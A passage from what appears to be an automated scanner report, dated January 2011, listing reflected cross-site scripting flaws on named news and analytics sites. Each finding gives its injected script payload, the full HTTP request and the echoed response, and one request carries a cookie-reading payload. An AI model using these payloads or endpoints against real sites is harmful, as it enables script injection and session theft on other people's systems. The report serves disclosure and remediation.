//-->
...[SNIP]...

5.220. http://recruiting.scout.com/a.z [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e24fa'-alert(1)-'162422719ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011&e24fa'-alert(1)-'162422719ee=1 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:53:06 GMT
Server: Microsoft-IIS/6.0
Server: Yesler
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 271 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:03:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211715

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...
<!--
function SeasonYearChange() {
document.location.href='/a.z?s=73&p=9&c=4&pid=88&e24fa'-alert(1)-'162422719ee=1&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;}
//-->
...[SNIP]...

5.221. http://redtape.newsvine.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redtape.newsvine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af369"-alert(1)-"8df14796428 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?af369"-alert(1)-"8df14796428=1 HTTP/1.1
Host: redtape.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:18:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=ad5ff547f0b671d901b18e62c2d4a6f5; expires=Sat, 25-Jan-2031 02:18:30 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 65874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
= "";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1078017","http://redtape.newsvine.com/?af369"-alert(1)-"8df14796428=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.222. http://s18.sitemeter.com/js/counter.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s18.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0dde'%3balert(1)//a0f43fc652c was submitted in the site parameter. This input was echoed as c0dde';alert(1)//a0f43fc652c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.asp?site=s18neumediac0dde'%3balert(1)//a0f43fc652c HTTP/1.1
Host: s18.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:50:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7304
Content-Type: application/x-javascript
Expires: Sun, 30 Jan 2011 02:00:20 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s18neumediac0dde';alert(1)//a0f43fc652c', 's18.sitemeter.com', '');

var g_sLastCodeName = 's18neumediac0dde';alert(1)//a0f43fc652c';
// ]]>
...[SNIP]...

5.223. http://s18.sitemeter.com/js/counter.js [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s18.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acf87'%3balert(1)//d9b40ce8ee5 was submitted in the site parameter. This input was echoed as acf87';alert(1)//d9b40ce8ee5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s18neumediaacf87'%3balert(1)//d9b40ce8ee5 HTTP/1.1
Host: s18.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:50:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7304
Content-Type: application/x-javascript
Expires: Sun, 30 Jan 2011 02:00:18 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s18neumediaacf87';alert(1)//d9b40ce8ee5', 's18.sitemeter.com', '');

var g_sLastCodeName = 's18neumediaacf87';alert(1)//d9b40ce8ee5';
// ]]>
...[SNIP]...

5.224. http://suzanne-choney.newsvine.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://suzanne-choney.newsvine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a101"-alert(1)-"af1288a8236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?8a101"-alert(1)-"af1288a8236=1 HTTP/1.1
Host: suzanne-choney.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=6bd6099d7f38f27c6294da411be59d89; expires=Sat, 25-Jan-2031 02:19:53 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
urrentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1477090","http://suzanne-choney.newsvine.com/?8a101"-alert(1)-"af1288a8236=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.225. http://technolog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ad7a"><script>alert(1)</script>5aa1ea45b3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4ad7a"><script>alert(1)</script>5aa1ea45b3a=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:36:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144003

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/?4ad7a"><script>alert(1)</script>5aa1ea45b3a=1&nvo=0&20126474|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.226. http://technolog.msnbc.redacted/_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3e23"><script>alert(1)</script>62f3033b750 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch?f3e23"><script>alert(1)</script>62f3033b750=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 18:26:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158035

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Apple would u
...[SNIP]...
<input type="hidden" name="redirect" value="http://technolog.msnbc.redacted/_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch?f3e23"><script>alert(1)</script>62f3033b750=1" />
...[SNIP]...

5.227. http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing-

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1306"><a>02312887712 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing-?a1306"><a>02312887712=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 18:23:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56942

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Yahoo search
...[SNIP]...
<input type="hidden" name="redirect" value="http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing-?a1306"><a>02312887712=1" />
...[SNIP]...

5.228. http://technolog.msnbc.redacted/_news/2010/08/26/4975799-big-facebook-sues-little-teachbook [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/26/4975799-big-facebook-sues-little-teachbook

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7447d"><a>65bfd247cb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /_news/2010/08/26/4975799-big-facebook-sues-little-teachbook?7447d"><a>65bfd247cb9=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 18:25:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97573

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Big Facebook
...[SNIP]...
<input type="hidden" name="redirect" value="http://technolog.msnbc.redacted/_news/2010/08/26/4975799-big-facebook-sues-little-teachbook?7447d"><a>65bfd247cb9=1" />
...[SNIP]...

5.229. http://technolog.msnbc.redacted/_nv/more/section/archive [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_nv/more/section/archive

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b45d"><script>alert(1)</script>9351ab4d91b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_nv/more/section4b45d"><script>alert(1)</script>9351ab4d91b/archive HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:06:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 243794

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_nv/more/section4b45d"><script>alert(1)</script>9351ab4d91b/archive?year=2011&month=1&ct=a&pc=25&sp=25#January 2011 archive_nav">
...[SNIP]...

5.230. http://technolog.msnbc.redacted/_nv/more/section/archive [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_nv/more/section/archive

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc67a"><script>alert(1)</script>e360a73df87 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_nv/more/section/archivebc67a"><script>alert(1)</script>e360a73df87 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 03:06:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 243794

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_nv/more/section/archivebc67a"><script>alert(1)</script>e360a73df87?year=2011&month=1&ct=a&pc=25&sp=25#January 2011 archive_nav">
...[SNIP]...

5.231. http://technolog.msnbc.redacted/_vine/printer [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_vine/printer

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload b7e29<img%20src%3da%20onerror%3dalert(1)>626a72a1b57 was submitted in the path parameter. This input was echoed as b7e29<img src=a onerror=alert(1)>626a72a1b57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=technolog&path=/_news/2011/01/28/*)(sn=*/b7e29<img%20src%3da%20onerror%3dalert(1)>626a72a1b57 HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:34:46 GMT
Connection: close
Content-Length: 529

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...
me":null,"displayName":null},"devMachine":false,"section":{"type":"g","contentSetId":"20126474","domainName":"technolog","displayName":"Technolog","avatar":null,"path":"\/_news\/2011\/01\/28\/*)(sn=*\/b7e29<img src=a onerror=alert(1)>626a72a1b57"},"revision":"23247"}

5.232. http://technolog.msnbc.redacted/amazon [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /amazon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebb0d"><script>alert(1)</script>11a092cdb61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /amazon?ebb0d"><script>alert(1)</script>11a092cdb61=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:00:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126981

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/amazon?ebb0d"><script>alert(1)</script>11a092cdb61=1&nvo=0&21488022|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.233. http://technolog.msnbc.redacted/app-store [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /app-store

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de647"><script>alert(1)</script>42a1c3fcb72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

